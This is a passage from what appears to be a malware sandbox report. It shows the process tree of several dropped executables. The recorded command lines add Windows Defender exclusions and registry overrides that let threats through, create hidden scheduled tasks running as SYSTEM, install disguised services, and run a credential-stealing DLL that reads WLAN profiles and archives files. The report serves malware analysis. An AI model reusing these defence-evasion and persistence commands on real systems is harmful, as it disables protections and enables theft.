        PID:6292
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4320
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5580
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 11:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS5B4A.tmp\Install.exe\" it /BKhdidCfTN 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:4068
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:4856
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:6364
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:5508
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        6⤵
        
        PID:3724
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3920
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1108
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1004
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5212
        
        C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        7⤵
        Executes dropped EXE
        
        PID:5272
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        7⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:4056
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 392
        6⤵
        Program crash
        
        PID:4740
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5612
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:2816
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        Executes dropped EXE
        
        PID:2516
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:5584
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        Executes dropped EXE
        
        PID:5724
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        
        PID:5440
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        
        PID:5812
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:2944
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        
        PID:5912
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:3636
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        
        PID:1812
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        
        PID:7156
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        
        PID:5520
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:5380
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        
        PID:1836
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        
        PID:3000
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        
        PID:6468
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:5952
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:5984
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:6028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\878097196921_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5640
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        Executes dropped EXE
        
        PID:5648
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:5904
      - C:\Users\Admin\AppData\Local\Temp\1000241001\ISetup8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000241001\ISetup8.exe"
        6⤵
        Executes dropped EXE
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\u1e4.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1e4.0.exe"
        7⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 1096
        8⤵
        Program crash
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\u1e4.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1e4.1.exe"
        7⤵
        
        PID:3040
      - C:\Users\Admin\AppData\Local\Temp\1000242001\toolspub1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000242001\toolspub1.exe"
        6⤵
        
        PID:2372
      - C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe"
        6⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe"
        7⤵
        
        PID:6388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2384
    - - C:\Users\Admin\AppData\Local\Temp\1000095001\angelfederal.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000095001\angelfederal.exe"
        5⤵
        
        PID:892
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Less Less.cmd & Less.cmd & exit
        6⤵
        
        PID:5136
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        
        PID:3924
- - C:\Users\Admin\AppData\Local\Temp\1000020001\7ad92a0bdc.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\7ad92a0bdc.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:2784
- - C:\Users\Admin\1000021002\bcb8ba0b64.exe
    "C:\Users\Admin\1000021002\bcb8ba0b64.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2372
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Drops file in Windows directory
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3784
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa1440cc40,0x7ffa1440cc4c,0x7ffa1440cc58
        5⤵
        
        PID:4388
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,4725540417412326535,12987171223272902324,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1816 /prefetch:2
        5⤵
        
        PID:2076
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2088,i,4725540417412326535,12987171223272902324,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2100 /prefetch:3
        5⤵
        
        PID:1952
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2108,i,4725540417412326535,12987171223272902324,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2340 /prefetch:8
        5⤵
        
        PID:1500
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,4725540417412326535,12987171223272902324,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3124 /prefetch:1
        5⤵
        
        PID:1552
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,4725540417412326535,12987171223272902324,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3160 /prefetch:1
        5⤵
        
        PID:4856
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3716,i,4725540417412326535,12987171223272902324,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4292 /prefetch:8
        5⤵
        
        PID:892

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5100 -ip 5100
1⤵
PID:980

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1004 -ip 1004
1⤵
PID:3040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5124

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:5896
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:5764
- - C:\Windows\Temp\286628.exe
    "C:\Windows\Temp\286628.exe" --list-devices
    3⤵
    PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4152 -ip 4152
1⤵
PID:1260

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
PID:5804

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:6308

C:\Users\Admin\AppData\Local\Temp\7zS15E4.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS15E4.tmp\Install.exe it /qbUdidUKAw 385118 /S
1⤵
PID:6508
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6808
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6008
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4672
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5960
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5996
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2796
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1048
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4100
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:6744
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4820
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5368
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:6864
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6900
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5320
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:2100
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:652
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:1136
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:6656
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6064
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\reg.exe
